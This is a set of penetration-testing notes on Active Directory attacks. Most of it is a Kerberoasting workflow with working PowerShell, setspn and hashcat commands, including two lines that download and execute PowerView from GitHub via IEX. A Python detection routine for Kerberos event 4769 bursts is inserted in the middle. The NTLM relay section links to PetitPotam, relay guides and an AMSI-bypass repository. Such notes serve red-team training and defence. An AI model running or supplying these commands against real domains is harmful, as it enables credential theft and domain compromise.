TTPs for Active Directory attacks
Some notes
Kerberoasting
Kerberoasting is an attack that abuses the Kerberos authentication protocol used by Active Directory: any authenticated domain user can request service tickets for accounts that have a Service Principal Name (SPN), and the encrypted part of each ticket is keyed with the service account's password hash, so the extracted tickets can be cracked offline to recover the plaintext passwords of those service accounts. Kerberoasting is often used to target high-privilege service accounts that are not subject to password rotation policies.
Workflow
01. Get SPNs
Using the AD PowerShell Module
# Get accounts with SPN
(Get-ADUser -Filter {servicePrincipalName -like '*'} -Properties servicePrincipalName).servicePrincipalName
Using setspn.exe
This is a built-in command that ships with Windows.
setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1
Using AD Searcher
# We use .NET (ADSI) here to connect to the domain via LDAP
$ADBaseDir = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList "LDAP://rootDSE").Get("defaultNamingContext")
# Non-computer objects that have at least one SPN set
$LDAPFilter = "(&(!(objectClass=computer))(servicePrincipalName=*))"
$DomainFQDN = "LDAP://$ADBaseDir"
$ADPropertiesToLoad = @("name", "samaccountname", "displayname", "serviceprincipalname", "serviceprincipalnames")
$Domain = New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList $DomainFQDN
$ADSearcher = New-Object System.DirectoryServices.DirectorySearcher
$ADSearcher.SearchRoot = $Domain
$ADSearcher.PageSize = 10
$ADSearcher.Filter = $LDAPFilter
$ADSearcher.SearchScope = "Subtree"
ForEach ($prop in $ADPropertiesToLoad) { [void]$ADSearcher.PropertiesToLoad.Add($prop) }
$Results = $ADSearcher.FindAll()
# Print each account name followed by its SPNs
$Results | ForEach-Object { $_.Properties['samaccountname']; $_.Properties['serviceprincipalname'] }
Using PowerView
# Launch shell as admin
# Load PowerSploit (host it in your own server of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Get-DomainUser -SPN
02. Request & Extract Roastable Kerberos Tickets
Using PowerView
# Launch shell as admin
# Load PowerSploit (host it in your own server of course...)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Invoke-Kerberoast -OutputFormat Hashcat | % {$_.Hash} | Out-File 'C:\somewhere\spn_accounts_hashes.txt'
03. Crack Hashes with Hashcat
- A Hashcat cheat sheet -> https://github.com/frizb/Hashcat-Cheatsheet
.\hashcat.exe -m 19700 -a 0 -w 2 --force --opencl-device-types 1,2 -O 'C:\spn_accounts_hashes.txt' D:\wordlists\rockyou.txt -r .\rules\OneRuleToRuleThemAll.rule
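As an added defensive example (not part of the original notes): detection logic for the activity in steps 01 to 03, run over constructed Windows Security event 4769 records ("A Kerberos service ticket was requested"). The field names, account names and service accounts below are made up; in practice the records would come from the domain controllers' Security logs or a SIEM export.

```python
"""Flag Kerberoasting-like bursts of TGS requests in Windows Security event 4769 data."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 records, reduced to the fields the detection needs.
# Etype 0x17 is RC4-HMAC (cheapest to crack); 0x12 is AES256 (hashcat -m 19700).
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:01", "account": "jdoe@MEDIN.LOCAL",   "service": "svc_sql",  "etype": "0x17"},
    {"time": "2024-01-10T09:00:02", "account": "jdoe@MEDIN.LOCAL",   "service": "svc_iis",  "etype": "0x17"},
    {"time": "2024-01-10T09:00:02", "account": "jdoe@MEDIN.LOCAL",   "service": "svc_bkp",  "etype": "0x12"},
    {"time": "2024-01-10T09:00:03", "account": "jdoe@MEDIN.LOCAL",   "service": "svc_sccm", "etype": "0x17"},
    {"time": "2024-01-10T09:00:04", "account": "jdoe@MEDIN.LOCAL",   "service": "svc_adfs", "etype": "0x17"},
    {"time": "2024-01-10T09:00:05", "account": "jdoe@MEDIN.LOCAL",   "service": "WS01$",    "etype": "0x12"},
    {"time": "2024-01-10T09:00:05", "account": "jdoe@MEDIN.LOCAL",   "service": "krbtgt",   "etype": "0x12"},
    {"time": "2024-01-10T08:10:00", "account": "asmith@MEDIN.LOCAL", "service": "svc_sql",  "etype": "0x12"},
    {"time": "2024-01-10T09:30:00", "account": "asmith@MEDIN.LOCAL", "service": "svc_iis",  "etype": "0x12"},
]
RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP


def is_user_service_request(ev):
    """Machine accounts ($) and the krbtgt TGT service are not wordlist-crackable; skip them."""
    svc = ev["service"]
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def detect_kerberoasting(events, threshold=5, window=timedelta(minutes=10)):
    """Alert when one account requests tickets for >= threshold distinct service
    accounts inside a sliding window; report how many of them were RC4."""
    by_account = defaultdict(list)
    for ev in events:
        if is_user_service_request(ev):
            by_account[ev["account"]].append(
                (datetime.fromisoformat(ev["time"]), ev["service"], ev["etype"].lower()))
    alerts = []
    for account, reqs in by_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:  # slide the window forward
                start += 1
            span = reqs[start:end + 1]
            services = {svc for _, svc, _ in span}
            if len(services) >= threshold:
                alerts.append({"account": account, "services": sorted(services),
                               "rc4_requests": sum(et in RC4_ETYPES for _, _, et in span),
                               "first": span[0][0].isoformat(), "last": span[-1][0].isoformat()})
                break  # one alert per account
    return alerts
```

The distinct-service count is the primary signal because legitimate clients rarely need tickets for many unrelated service accounts within minutes, while the RC4 count is reported separately since AES tickets are also roastable (as the -m 19700 mode above shows) and a single RC4 request may just be a legacy application.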
References
- The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
- Link to PowerView v3.0 tricks by HarmJ0y: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
- Repository. Great Kerberoast scripts (including some python ones) by Tim Medin: https://github.com/nidem/kerberoast
- Repository. All things hacky but especially some good AMSI bypasses: https://github.com/m0chan/h4cks
- Repository. Great repo by Scott Sutherland on PowerShell scripts for hacking (still actively maintained as of 2020): https://github.com/nullbind/Powershellery
- Article. How to attack Kerberos by M0chan: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
- Article. How to attack Kerberos by Tarlogic: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
- Article. Discovering SPNs: https://pentestlab.blog/2018/06/04/spn-discovery/
NTLM Relay
Using PetitPotam
The tool can be obtained here: https://github.com/topotam/PetitPotam/blob/main/Petitpotam.py (note, requires Impacket to be installed)
References
- Good practical guide showing how to run ntlmrelayx.py with the Certificate Authority (CA) as the relay target: https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/
- Guide using PayloadsAllTheThings: https://gitlab.com/pentest-tools/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#ad-cs-relay-attack
- Performing a similar attack with RemotePotato: https://github.com/antonioCoco/RemotePotato0
- Takeover via RBCD (Resource Based Constrained Delegation): https://gist.github.com/audibleblink/06916db2a76c7bd13400c4f9da422ad5
- Mitigations: https://threatpost.com/microsoft-petitpotam-poc/168163/